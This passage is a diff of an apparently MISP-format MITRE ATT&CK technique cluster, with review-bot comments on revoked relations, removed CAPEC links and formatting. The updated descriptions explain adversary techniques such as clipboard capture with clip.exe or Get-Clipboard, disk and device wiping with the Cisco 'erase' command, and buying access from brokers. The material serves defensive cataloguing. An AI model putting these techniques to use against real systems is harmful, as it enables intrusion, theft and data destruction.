"https://en.wikipedia.org/wiki/Windows_Registry"
]
},
@@ -22940,7 +23283,7 @@
"value": "Query Registry - T1012"
},
{
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. \n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. 
In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)",
"meta": {
"external_id": "T1021",
"kill_chain": [
@@ -22963,7 +23306,6 @@
"refs": [
"http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html",
"https://attack.mitre.org/techniques/T1021",
- "https://capec.mitre.org/data/definitions/555.html",
"https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf",
"https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins",
"https://support.apple.com/en-us/HT201710",
@@ -23142,15 +23484,7 @@
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
]
},
- "related": [
- {
- "dest-uuid": "6747daa2-3533-4e78-8fb8-446ebb86448a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "revoked-by"
- }
- ],
+ "related": [],
"uuid": "06780952-177c-4247-b978-79c357fb311f",
"value": "Plist Modification - T1150"
},
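Review bot: replacing the revoked-by relation with "related": [] discards the pointer from "Plist Modification - T1150" to the technique it was revoked by (dest-uuid 6747daa2-3533-4e78-8fb8-446ebb86448a), so anyone resolving this cluster can no longer find the superseding technique. If T1150 is still revoked upstream the relation should stay; if it is being removed because that UUID no longer exists in the galaxy, say so in the commit message.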
@@ -24089,7 +24423,6 @@
"http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html",
"https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
"https://attack.mitre.org/techniques/T1055",
- "https://capec.mitre.org/data/definitions/640.html",
"https://docs.microsoft.com/sysinternals/downloads/sysmon",
"https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"https://www.gnu.org/software/acct/"
@@ -24098,6 +24431,27 @@
"uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
"value": "Process Injection - T1055"
},
+ {
+ "description": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. 
Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+ "meta": {
+ "external_id": "T1650",
+ "kill_chain": [
+ "mitre-attack:resource-development"
+ ],
+ "mitre_platforms": [
+ "PRE"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1650",
+ "https://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a",
+ "https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/",
+ "https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ ]
+ },
+ "uuid": "d21bb61f-08ad-4dc1-b001-81ca6cb79954",
+ "value": "Acquire Access - T1650"
+ },
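Review bot: the description string of the new "Acquire Access - T1650" entry is rendered as two physical lines, breaking after "focus their efforts on later stages of compromise. " and resuming at "Adversaries may prioritize"; as with the other long descriptions in this change, confirm this is a display artifact and not a literal newline inside the JSON string. The entry also has no mitre_data_sources key, unlike neighbouring technique entries; if that is intentional because the technique sits on the PRE platform under mitre-attack:resource-development, a line in the commit message would avoid the question being raised again. The four citation keys in the text each correspond to one of the five refs URLs, which is fine.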
{
"description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).",
"meta": {
@@ -24122,15 +24476,14 @@
],
"refs": [
"http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf",
- "https://attack.mitre.org/techniques/T1056",
- "https://capec.mitre.org/data/definitions/569.html"
+ "https://attack.mitre.org/techniques/T1056"
]
},
"uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
"value": "Input Capture - T1056"
},
{
- "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process
via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot
. In Mac and Linux, this is accomplished with the ps
command. Adversaries may also opt to enumerate processes via /proc.",
+ "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process
via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot
. In Mac and Linux, this is accomplished with the ps
command. Adversaries may also opt to enumerate processes via /proc.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)",
"meta": {
"external_id": "T1057",
"kill_chain": [
@@ -24144,11 +24497,13 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1057",
- "https://capec.mitre.org/data/definitions/573.html"
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760",
+ "https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
},
"uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
@@ -24186,7 +24541,7 @@
"value": "Stage Capabilities - T1608"
},
{
- "description": "Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.",
+ "description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.",
"meta": {
"external_id": "T1087",
"kill_chain": [
@@ -24209,7 +24564,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1087",
- "https://capec.mitre.org/data/definitions/575.html",
"https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
]
},
@@ -24245,7 +24599,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1078",
- "https://capec.mitre.org/data/definitions/560.html",
"https://technet.microsoft.com/en-us/library/dn487457.aspx",
"https://technet.microsoft.com/en-us/library/dn535501.aspx",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-074a",
@@ -24310,7 +24663,8 @@
"Linux",
"macOS",
"Google Workspace",
- "SaaS"
+ "SaaS",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1098",
@@ -24344,7 +24698,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1112",
"https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/",
- "https://capec.mitre.org/data/definitions/203.html",
"https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull",
"https://docs.microsoft.com/sysinternals/downloads/reghide",
"https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657",
@@ -24404,7 +24757,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1113",
"https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/",
- "https://capec.mitre.org/data/definitions/648.html",
"https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8"
]
},
@@ -24536,7 +24888,7 @@
"value": "Input Prompt - T1141"
},
{
- "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nIn Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste
, to grab clipboard contents.(Citation: Operating with EmPyre)",
+ "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using clip.exe
or Get-Clipboard
.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as pbpaste
, to grab clipboard contents.(Citation: Operating with EmPyre)",
"meta": {
"external_id": "T1115",
"kill_chain": [
@@ -24553,9 +24905,11 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1115",
- "https://capec.mitre.org/data/definitions/637.html",
+ "https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems",
+ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip",
"https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363",
- "https://msdn.microsoft.com/en-us/library/ms649012"
+ "https://msdn.microsoft.com/en-us/library/ms649012",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa21-200b"
]
},
"uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f",
@@ -24694,8 +25048,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1123",
- "https://capec.mitre.org/data/definitions/634.html"
+ "https://attack.mitre.org/techniques/T1123"
]
},
"uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
@@ -24781,7 +25134,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1125",
- "https://capec.mitre.org/data/definitions/634.html",
"https://objective-see.com/blog/blog_0x25.html"
]
},
@@ -24806,15 +25158,7 @@
"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
]
},
- "related": [
- {
- "dest-uuid": "6747daa2-3533-4e78-8fb8-446ebb86448a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "revoked-by"
- }
- ],
+ "related": [],
"uuid": "36675cd3-fe00-454c-8516-aebecacbe9d9",
"value": "Login Item - T1162"
},
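Review bot: as for the other revoked entry in this change, setting "related": [] on "Login Item - T1162" removes its revoked-by link to dest-uuid 6747daa2-3533-4e78-8fb8-446ebb86448a, so the object no longer says what replaced it. Either keep the relation while the technique remains revoked upstream, or document in the commit message that the target UUID has been dropped from the galaxy and the relation is therefore unresolvable.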
@@ -25025,7 +25369,8 @@
"IaaS",
"Linux",
"macOS",
- "Google Workspace"
+ "Google Workspace",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1136",
@@ -25466,7 +25811,7 @@
"value": "LC_MAIN Hijacking - T1149"
},
{
- "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+ "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)",
"meta": {
"external_id": "T1561",
"kill_chain": [
@@ -25482,12 +25827,14 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1561",
"https://docs.microsoft.com/sysinternals/downloads/sysmon",
- "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf"
+ "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463"
]
},
"uuid": "1988cc35-ced8-4dad-b2d1-7628488fa967",
@@ -25617,8 +25964,7 @@
"Google Workspace"
],
"refs": [
- "https://attack.mitre.org/techniques/T1518",
- "https://capec.mitre.org/data/definitions/580.html"
+ "https://attack.mitre.org/techniques/T1518"
]
},
"uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58",
@@ -26041,6 +26387,7 @@
"mitre-attack:credential-access"
],
"mitre_data_sources": [
+ "Application Log: Application Log Content",
"Command: Command Execution",
"File: File Access",
"Process: Process Creation",
@@ -26056,7 +26403,8 @@
"Linux",
"macOS",
"Google Workspace",
- "Containers"
+ "Containers",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1552"
@@ -26066,7 +26414,7 @@
"value": "Unsecured Credentials - T1552"
},
{
- "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
+ "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
"meta": {
"external_id": "T1562",
"kill_chain": [
@@ -26084,6 +26432,7 @@
"Script: Script Execution",
"Sensor Health: Host Status",
"Service: Service Metadata",
+ "User Account: User Account Modification",
"Windows Registry: Windows Registry Key Deletion",
"Windows Registry: Windows Registry Key Modification"
],
@@ -26097,7 +26446,8 @@
"Network"
],
"refs": [
- "https://attack.mitre.org/techniques/T1562"
+ "https://attack.mitre.org/techniques/T1562",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/#:~:text=Don’t%20Sleep%20has%20the%20capability%20to%20keep%20the%20computer%20from%20being%20shutdown%20and%20the%20user%20from%20being%20signed%20off.%20This%20was%20likely%20done%20to%20ensure%20nothing%20will%20interfere%20with%20the%20propagation%20of%20the%20ransomware%20payload"
]
},
"uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
@@ -26326,7 +26676,7 @@
"value": "Encrypted Channel - T1573"
},
{
- "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
+ "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
"meta": {
"external_id": "T1583",
"kill_chain": [
@@ -26347,6 +26697,7 @@
"https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf",
"https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2",
"https://threatconnect.com/blog/infrastructure-research-hunting/",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
"https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation"
]
},
@@ -26443,7 +26794,7 @@
"value": "Hide Artifacts - T1564"
},
{
- "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) \n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)",
+ "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus)\n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)",
"meta": {
"external_id": "T1584",
"kill_chain": [
@@ -26466,6 +26817,7 @@
"https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2",
"https://threatconnect.com/blog/infrastructure-research-hunting/",
"https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
"https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
"https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf",
"https://www.icann.org/groups/ssac/documents/sac-007-en",
@@ -26732,7 +27084,7 @@
"value": "Active Scanning - T1595"
},
{
- "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).",
+ "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).",
"meta": {
"external_id": "T1586",
"kill_chain": [
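Review bot: the new clause "or paying employees, suppliers or business partners for access to credentials" is backed by `(Citation: Microsoft DEV-0537)`, whose URL is added in the next refs hunk, so the pairing is complete. The string still carries a trailing space before the first `\n\n` ("compromised persona. \n\n"); it is pre-existing upstream whitespace and will come back on every regeneration, so leave it rather than hand-trimming it here.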
@@ -26747,7 +27099,8 @@
],
"refs": [
"https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/",
- "https://attack.mitre.org/techniques/T1586"
+ "https://attack.mitre.org/techniques/T1586",
+ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"
]
},
"uuid": "81033c3b-16a4-46e4-8fed-9b030dd03c4a",
@@ -26912,7 +27265,6 @@
"https://arxiv.org/abs/1809.05681",
"https://attack.mitre.org/techniques/T1557",
"https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/",
- "https://capec.mitre.org/data/definitions/94.html",
"https://securelist.com/ad-blocker-with-miner-included/101105/",
"https://tlseminar.github.io/downgrade-attacks/",
"https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/",
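Review bot: dropping `https://capec.mitre.org/data/definitions/94.html` leaves T1557 with no CAPEC cross-reference, and the same removal recurs through the rest of this file (definitions 555, 568, 636, 630, 552, 509, 177, 98). If this mirrors the upstream ATT&CK bundle no longer emitting CAPEC external references, say so in the commit message so consumers that keyed correlations on those URLs know the mapping is gone deliberately; if it is a generator change on this side, the links should be kept.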
@@ -27135,7 +27487,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1021/004",
- "https://capec.mitre.org/data/definitions/555.html",
"https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"
]
},
@@ -27168,7 +27519,6 @@
"refs": [
"http://lists.openstack.org/pipermail/openstack/2013-December/004138.html",
"https://attack.mitre.org/techniques/T1021/005",
- "https://capec.mitre.org/data/definitions/555.html",
